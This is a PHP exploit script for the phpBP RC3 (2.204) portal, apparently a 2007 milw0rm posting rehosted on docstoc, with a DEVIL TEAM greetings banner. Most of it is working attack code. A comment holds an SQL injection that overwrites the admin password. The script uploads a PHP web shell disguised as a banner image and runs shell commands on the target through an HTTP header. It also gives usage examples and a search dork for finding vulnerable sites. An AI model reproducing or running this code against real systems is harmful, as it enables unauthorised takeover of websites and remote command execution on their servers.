phpBP RC3 2.204 sqlcmd Remote Code Execution Exploit

Document Sample
phpBP RC3 2.204 sqlcmd Remote Code Execution Exploit Powered By Docstoc
					                                phpBP RC3 2.204 sqlcmd Remote Code Execution Exploit     Page 1/5
  1    <?
  2    //**************************************************************
  3    //Kacper & str0ke Settings
  4    $exploit_name = "phpBP <= RC3 (2.204) (sql/cmd) Remote Code Execution Exploit";
  5    $script_name = "phpBP RC3 (2.204)";
  6    $script_site = "http://www.phpbp.com/";
  7    $dork = ’Silnik strony jest chroniony prawami autorskimi PHP BP Team’;
  8    //to work exploit you need admin session
  9    //**************************************************************
  10   print ’
  11   ::::::::: :::::::::: ::: ::: ::::::::::: :::
  12   :+: :+: :+:            :+: :+: :+: :+:
  13   +:+ +:+ +:+              +:+ +:+ +:+ +:+
  14   +#+ +:+ +#++:++# +#+ +:+ +#+ +#+
  15   +#+ +#+ +#+                 +#+ +#+          +#+ +#+
  16   #+# #+# #+#                 #+#+#+#          #+# #+#
  17   ######### ########## ### ########### ##########
  18   ::::::::::: :::::::::: ::: :::: ::::
  19       :+: :+:             :+: :+: +:+:+: :+:+:+
  20       +:+ +:+              +:+ +:+ +:+ +:+:+ +:+
  21       +#+ +#++:++# +#++:++#++: +#+ +:+ +#+
  22       +#+ +#+              +#+ +#+ +#+             +#+
  23       #+# #+#              #+# #+# #+#            #+#
  24       ### ########## ### ### ###                     ###
  25
  26     − − [DEVIL TEAM THE BEST POLISH TEAM] − −
  27
  28
  29   [Exploit name: ’.$exploit_name.’
  30   [Script name: ’.$script_name.’
  31   [Script site: ’.$script_site.’
  32   dork: ’.$dork.’
  33
  34   Find by: Kacper (a.k.a Rahim)
  35   Blog: http://kacper.bblog.pl/
  36
  37   DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam
  38   DEVIL TEAM HOME: http://www.rahim.webd.pl/
  39
  40   Contact: kacper1964@yahoo.pl
  41
  42   (c)od3d by Kacper
  43   −=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−
  44   Greetings DragonHeart and all DEVIL TEAM Patriots :)
  45   − Leito & Leon | friend str0ke ;)
  46
  47   pepi, D0han, d3m0n, D3m0n (ziom z Niemiec :P)
  48   dn0de, DUREK5, fdj, konsol, mass, michalind, mIvus, nukedclx, QunZ,
  49   RebeL, SkD, Adam, drzewko, Leito, LEON, TomZen, dub1osu, ghost, WRB
  50
  51   and
  52

Kacper                                                                                   01/18/2007
                          phpBP RC3 2.204 sqlcmd Remote Code Execution Exploit                                     Page 2/5
  53    Dr Max Virus
  54    TamTurk,
  55    hackersecurity.org
  56    and all exploit publishers
  57    −=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−
  58              Greetings for 4ll Fusi0n Group members ;−)
  59              and all members of hacker.com.pl ;)
  60    −=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−
  61
  62         Kacper Hacking & Security Blog: http://kacper.bblog.pl/
  63    ’;
  64    /*
  65    Exploit upload evil script when admin add new banner in portal.
  66
  67    i Find some errors in forum. Enter in comment forum:
  68


                                                           */
  69    //fajny’;UPDATE/**/‘22_users‘/**/SET/**/‘pass‘/**/=/**/’6a8f25e5b30777a0435c22fe36f45e3c’,‘buddies‘/**/=/**/NULL,‘for
        um_subscribed‘/**/=/**/NULL,‘forum_subscribed_clicked‘/**/=/**/NULL,‘forum_unsubscribe‘/**/=/**/NULL/**/WHERE/**/‘id‘
        /**/=/**/’1’/**/LIMIT/**/1;
  70    /*
  71    then you can insert SQL code :)
  72    */
  73    if ($argc<5) {
  74    print_r(’
  75    −=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−
  76    Usage: php ’.$argv[0].’ host path admin_session cmd OPTIONS
  77    host:    target server (ip/hostname)
  78    path:     phpBP Forum path
  79    admin_session: admin session id
  80    cmd:       a shell command (ls −la)
  81    Options:
  82     −p[port]: specify a port other than 80
  83     −P[ip:port]: specify a proxy
  84    Example:
  85    php ’.$argv[0].’ 2.2.2.2 /phpBP/ d6c6cae3dfea20a0a5358fc9baff47be ls −la −P1.1.1.1:80
  86    php ’.$argv[0].’ 2.2.2.2 /phpBP/ d6c6cae3dfea20a0a5358fc9baff47be ls −la
  87    −=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−
  88    ’);
  89    die;
  90    }
  91    error_reporting(0);
  92    ini_set("max_execution_time",0);
  93    ini_set("default_socket_timeout",5);
  94    function quick_dump($string)
  95    {
  96       $result=’’;$exa=’’;$cont=0;
  97       for ($i=0; $i<=strlen($string)−1; $i++)
  98       {
  99         if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
  100        {$result.=" .";}
Kacper                                                                                                              01/18/2007
                          phpBP RC3 2.204 sqlcmd Remote Code Execution Exploit                     Page 3/5
  101        else
  102        {$result.=" ".$string[$i];}
  103        if (strlen(dechex(ord($string[$i])))==2)
  104        {$exa.=" ".dechex(ord($string[$i]));}
  105        else
  106        {$exa.=" 0".dechex(ord($string[$i]));}
  107        $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  108      }
  109     return $exa."\r\n".$result;
  110   }
  111   $proxy_regex = ’(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)’;
  112   function sendpacket($packet)
  113   {
  114      global $proxy, $host, $port, $html, $proxy_regex;
  115      if ($proxy==’’) {
  116         $ock=fsockopen(gethostbyname($host),$port);
  117         if (!$ock) {
  118           echo ’No response from ’.$host.’:’.$port; die;
  119         }
  120      }
  121      else {
  122              $c = preg_match($proxy_regex,$proxy);
  123         if (!$c) {
  124           echo ’Not a valid proxy...’;die;
  125         }
  126         $parts=explode(’:’,$proxy);
  127         echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
  128         $ock=fsockopen($parts[0],$parts[1]);
  129         if (!$ock) {
  130           echo ’No response from proxy...’;die;
  131              }
  132      }
  133      fputs($ock,$packet);
  134      if ($proxy==’’) {
  135         $html=’’;
  136         while (!feof($ock)) {
  137           $html.=fgets($ock);
  138         }
  139      }
  140      else {
  141         $html=’’;
  142         while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
  143           $html.=fread($ock,1);
  144         }
  145      }
  146      fclose($ock);
  147   }
  148   function make_seed()
  149   {
  150       list($usec, $sec) = explode(’ ’, microtime());
  151       return (float) $sec + ((float) $usec * 100000);
  152   }
Kacper                                                                                             01/18/2007
                                phpBP RC3 2.204 sqlcmd Remote Code Execution Exploit                                                                         Page 4/5
  153   $host=$argv[1];
  154   $path=$argv[2];
  155   $adsess=$argv[3];
  156   $cmd="";
  157   $port=80;
  158   $proxy="";
  159   for ($i=4; $i<$argc; $i++){
  160   $temp=$argv[$i][0].$argv[$i][1];
  161   if (($temp<>"−p") and ($temp<>"−P")) {$cmd.=" ".$argv[$i];}
  162   if ($temp=="−p")
  163   {
  164      $port=str_replace("−p","",$argv[$i]);
  165   }
  166   if ($temp=="−P")
  167   {
  168      $proxy=str_replace("−P","",$argv[$i]);
  169   }
  170   }
  171   if ($proxy==’’) {$p=$path;} else {$p=’http://’.$host.’:’.$port.$path;}
  172   echo "Connected...\n";
  173   $data ="−−H4ck\r\n";
  174   $data.="Content−Disposition: form−data; name=\"url\";\r\n\r\n";
  175   $data.="http://kacper.bblog.pl/\r\n";
  176   $data ="−−H4ck\r\n";
  177   $data.="Content−Disposition: form−data; name=\"limit\";\r\n\r\n";
  178   $data.="0\r\n";
  179   $data ="−−H4ck\r\n";
  180   $data.="Content−Disposition: form−data; name=\"image\";\r\n\r\n";
  181   $data.="1\r\n";
  182   $data ="−−H4ck\r\n";
  183   $data.="Content−Disposition: form−data; name=\"form\";\r\n\r\n";
  184   $data.="1\r\n";
  185   $data ="−−H4ck\r\n";
  186   $data.="Content−Disposition: form−data; name=\"image_form\" filename=\"d.jpg.vil.gif.php\";\r\n\r\n";
  187   $data.="Content−Type: text/plain\r\n";
  188   $data.="Content−Transfer−Encoding: binary\r\n";
  189   $data.=’<?php ob_clean();//Ruchomy zamek Hauru ;−)echo"...Hacker..Kacper..Made..in..Poland!!...DEVIL.TEAM..the..best..polish..team..Greetz...";echo"...Go To DEVIL
        TEAM IRC: irc.milw0rm.com:6667 #devilteam";echo"...DEVIL TEAM SITE: http://www.rahim.webd.pl/";ini_set("max_execution_time",0);echo "Hauru";passthru($_SER
        VER[HTTP_HAURU]);die;?>\r\n’;
  190   $data ="−−H4ck\r\n";
  191   $data.="Content−Disposition: form−data; name=\"image_http\";\r\n\r\n";
  192   $data.="http://\r\n";
  193   $data ="−−H4ck\r\n";
  194   $data.="Content−Disposition: form−data; name=\"swf\";\r\n\r\n";
  195   $data.="0\r\n";
  196   $data ="−−H4ck\r\n";
  197   $data.="Content−Disposition: form−data; name=\"alt\";\r\n\r\n";
  198   $data.="0\r\n";
  199   $data ="−−H4ck\r\n";
  200   $data.="Content−Disposition: form−data; name=\"submit\";\r\n\r\n";
  201   $data.="Add\r\n";
  202   $data.="−−H4ck−−\r\n";
Kacper                                                                                                                                                        01/18/2007
                           phpBP RC3 2.204 sqlcmd Remote Code Execution Exploit             Page 5/5
  203   echo "wait now insert evil code...\n";
  204   $packet ="POST ".$p."index.php?module=admin&action=banners&cmd=add HTTP/1.0\r\n";
  205   $packet.="Cookie: phpBP2=".$adsess.";\r\n";
  206   $packet.="Content−Type: multipart/form−data; boundary=−−H4ck\r\n";
  207   $packet.="Host: ".$host."\r\n";
  208   $packet.="Content−Length: ".strlen($data)."\r\n";
  209   $packet.="Connection: Close\r\n\r\n";
  210   $packet.=$data;
  211   sendpacket($packet);
  212   $packet ="GET ".$p."index.php?module=admin&action=banners HTTP/1.0\r\n";
  213   $packet.="Cookie: phpBP2=".$adsess.";\r\n";
  214   $packet.="Host: ".$host."\r\n";
  215   $packet.="Connection: Close\r\n\r\n";
  216   sendpacket($packet);
  217   $temp=explode(’<TD CLASS="row_1" ALIGN="CENTER"><A HREF="upload/banners/’,$html);
  218   $temp2=explode(’.php" TARGET="_blank">’,$temp[1]);
  219   $uploadid=trim($temp2[0]);
  220   if ($uploadid) {echo "Step 1\n";
  221   echo "Upload id: ".$uploadid."\n";
  222   $packet ="GET ".$p."upload/banners/".$uploadid.".php HTTP/1.0\r\n";
  223   $packet.="HAURU: ".$cmd."\r\n";
  224   $packet.="Host: ".$host."\r\n";
  225   $packet.="Connection: Close\r\n\r\n";
  226   $packet.=$data;
  227   sendpacket($packet);
  228   sleep(1);
  229   }else {
  230   echo "exploit failed... can’t upload script :/\n";
  231   echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n";
  232   die("\n\nClose Connection");
  233   }
  234   if (strstr($html,"Hauru"))
  235   {
  236   $temp=explode("Hauru",$html);
  237   die($temp[1]);
  238   }
  239   ?>
  240
  241   # milw0rm.com [2007−01−18]




Kacper                                                                                      01/18/2007

				
DOCUMENT INFO